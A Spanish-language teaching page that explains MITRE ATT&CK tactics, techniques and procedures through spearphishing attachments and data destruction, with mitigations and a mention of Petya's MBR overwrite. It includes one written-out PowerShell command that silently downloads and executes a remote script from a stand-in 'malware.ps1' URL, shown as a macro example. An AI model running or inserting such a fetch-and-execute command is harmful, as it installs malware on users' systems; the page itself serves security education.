# Ejemplo teorico

Exploraremos dos tácticas, técnicas y procedimientos para comprender cómo se manifiestan en escenarios de ciberseguridad.

## <mark style="color:red;">**Tácticas**</mark>

1. [<mark style="color:red;">**Initial Access (Acceso Inicial)**</mark>](https://attack.mitre.org/tactics/TA0001/)
   * **Definición:** Describe las formas en que los adversarios intentan obtener un punto de apoyo dentro de una red, red de endpoints o un sistema.
2. <mark style="color:red;">**Impact (Impacto)**</mark>
   * **Definición:** Se refiere a las tácticas que los atacantes utilizan para desbaratar la operación normal y/o destruir sistemas y datos.

## <mark style="color:red;">**Técnicas**</mark>

1. [<mark style="color:red;">**Spearphishing Attachment (T1193)**</mark>](https://attack.mitre.org/techniques/T1566/001/)
   * **Pertenece a la Táctica:** Initial Access.
   * **Definición:** Se refiere al uso de emails dirigidos que incluyen archivos maliciosos adjuntos.
   * **Mitigación:** Formación de usuarios en conciencia de seguridad y filtrado de correos electrónicos para eliminar los que contienen adjuntos sospechosos.
2. [<mark style="color:red;">**Data Destruction (T1485)**</mark>](https://attack.mitre.org/techniques/T1485/)
   * **Pertenece a la Táctica:** Impact.
   * **Definición:** Los adversarios destruyen datos y/o archivos de sistemas de red para causar impacto a las operaciones del negocio y a la disponibilidad de los datos.
   * **Mitigación:** Implementar copias de seguridad regulares y robustas para recuperar los datos en caso de destrucción.

## <mark style="color:red;">**Procedimientos**</mark>

1. <mark style="color:red;">**Uso de Documentos con Macros para Acceso Inicial**</mark>

   * <mark style="color:red;">**Técnica Relacionada:**</mark> Spearphishing Attachment (T1193).
   * <mark style="color:red;">**Procedimiento:**</mark> Los adversarios pueden enviar correos electrónicos que contengan documentos maliciosos que, al abrirlos, ejecutan macros diseñadas para descargar e instalar malware.

   Ejemplo de un comando que podría ser utilizado en una macro para descargar malware:

   <pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell">powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://spartan.com/malware.ps1');
   </code></pre>
2. <mark style="color:red;">**Ransomware que Sobrescribe el MBR**</mark>

   * <mark style="color:red;">**Técnica Relacionada:**</mark> Data Destruction (T1485).
   * <mark style="color:red;">**Procedimiento:**</mark> Los atacantes podrían utilizar ransomware que, en lugar de cifrar archivos individuales, sobrescribe el Master Boot Record (MBR) del sistema comprometido, haciéndolo inaccesible.

   Un ejemplo infame de esto es el ransomware "Petya", que reemplazó el MBR con su propia carga útil, forzando un reinicio del sistema y mostrando una pantalla de rescate en lugar de permitir que el sistema operativo se cargara.